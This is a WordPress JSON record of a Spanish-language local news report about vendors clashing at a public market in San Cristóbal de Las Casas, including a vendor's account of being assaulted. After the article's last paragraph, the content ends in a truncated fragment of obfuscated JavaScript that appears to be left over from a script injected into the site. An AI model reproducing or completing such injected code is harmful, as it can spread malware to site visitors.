{"id":2393,"date":"2022-05-26T23:31:57","date_gmt":"2022-05-26T23:31:57","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2393"},"modified":"2022-05-26T23:31:57","modified_gmt":"2022-05-26T23:31:57","slug":"se-enfrentan-vendedores-del-mercado-castillo-tielmans-de-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2393","title":{"rendered":"Se enfrentan vendedores del Mercado Castillo Tielmans de San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220526-WA0078-1024x768.jpg\" alt=\"\" class=\"wp-image-2394\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220526-WA0078-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220526-WA0078-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220526-WA0078-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220526-WA0078.jpg 1040w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>26 de mayo del 2022. San Crist\u00f3bal de Las Casas.- El problema entre grupos de locatarios del Mercado P\u00fablico Municipal \u201cJos\u00e9 Castillo Ti\u00e9lemans\u201d y vendedores ambulantes o que se encuentran fuera de la nave principal del inmueble, ya que en esta ocasi\u00f3n agredieron f\u00edsicamente a Marcelino G\u00f3mez D\u00edaz, quien es taquero y se encuentra creando un grupo diferente al de la Almetrach, llamado La Unidad es la Fuerza.<\/p>\n\n\n\n<p>En entrevista a las afueras de Palacio de Justicia a donde acudi\u00f3 para interponer una denuncia, se\u00f1al\u00f3 que fue agredido por Enrique, mejor conocido como \u201cEl Negrito Bimbo\u201d, acompa\u00f1ado de otra persona de nombre Manuel y otras que desconoce su nombre, pero advirti\u00f3 que no se va dejar e interpondr\u00e1 una denuncia, pues fue amenazado y teme que le suceda algo.<\/p>\n\n\n\n<p>\u201cEl problema es la reconstrucci\u00f3n del mercado y ese grupo de locatarios empezaron a juntar la gente, buscaron esa forma de meterle miedo a la gente, se corre el rumor que una vez que empiece la construcci\u00f3n ya no van a dejar vender a los que nos encontramos alrededor, cosa que no es cierto, yo no puedo decir nada porque estoy al lado del mercado no formo parte, ese proyecto no nos va afectar sino a los de nave principal\u201d.<\/p>\n\n\n\n<p>Se\u00f1al\u00f3 que no tiene argumentos para oponerse a la obra, ya que no vende en el mercado, pero los locatarios no quieren que forme un nuevo grupo, que por el momento tiene 80 personas, donde hay mujeres y personas de la tercera edad, \u201cellos no tienen derecho de intimidarnos, no somos delincuentes, tenemos derecho a levantar la voz, nuestra intenci\u00f3n es la defensa de nuestro derecho, porque no estamos de acuerdo con lo que hacen los grupos de locatarios\u201d.<\/p>\n\n\n\n<p>\u201cNo son personas pac\u00edficas, no me hubieran hecho esto, me aventaron salsa, inici\u00f3 el problema porque grab\u00e9 un audio donde dije que no tengan miedo los compa\u00f1eros, porque los rondines no tiene caso, les hice saber que el mercado tiene due\u00f1o, no tenemos que oponernos a la causa, ah\u00ed es donde empezaron a molestarme, esa fue la molestia. Hoy hubo amenaza de que nos van a cerrar nuestros puestos y nos van a multar\u201d, finaliz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 26 de mayo del 2022. San Crist\u00f3bal de Las Casas.- El problema entre grupos de locatarios del Mercado P\u00fablico Municipal \u201cJos\u00e9 Castillo Ti\u00e9lemans\u201d y vendedores ambulantes o que se encuentran fuera de la nave principal del inmueble, ya que en esta ocasi\u00f3n agredieron f\u00edsicamente a Marcelino G\u00f3mez D\u00edaz, quien es taquero y se &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2394,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,17],"tags":[],"class_list":["post-2393","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas","category-portada"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2393","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2393"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2393\/revisions"}],"predecessor-version":[{"id":2395,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2393\/revisions\/2395"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2394"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2393"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2393"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2393"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}